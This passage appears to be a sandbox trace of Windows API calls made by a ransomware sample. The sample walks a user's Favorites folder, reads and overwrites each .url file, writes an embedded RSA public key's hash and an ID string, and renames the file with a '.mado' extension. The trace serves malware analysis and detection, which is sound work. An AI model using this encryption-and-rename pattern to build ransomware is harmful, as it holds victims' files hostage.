HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.312] WriteFile (in: hFile=0x63c, lpBuffer=0x2eee30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2eee30*, lpNumberOfBytesWritten=0x39cfb14*=0x80, lpOverlapped=0x0) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.312] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.312] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.312] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.313] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.313] CloseHandle (hObject=0x63c) returned 1 [0205.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b66078 [0205.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74e80 [0205.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0205.314] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.mado")) returned 1 [0205.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.314] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.315] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0205.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.315] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0205.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.316] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.316] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.318] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.318] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.319] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.319] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.319] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.320] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.320] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.320] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.320] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.320] GetLastError () returned 0x0 [0205.320] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.320] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.320] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.320] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.320] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.320] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81590 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b815d8 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.321] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7c0 | out: hHeap=0x2c0000) returned 1 [0205.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe790 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe778 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0205.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7c0 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.322] GetCurrentThreadId () returned 0x600 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68c48 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.322] GetCurrentThreadId () returned 0x600 [0205.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.324] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.324] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.324] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.324] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.324] CloseHandle (hObject=0x63c) returned 1 [0205.325] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.mado")) returned 1 [0205.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.326] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.327] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0205.327] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0205.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.327] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.327] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.329] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.329] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.330] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.330] lstrlenA (lpString="-----BEGIN PUBLIC 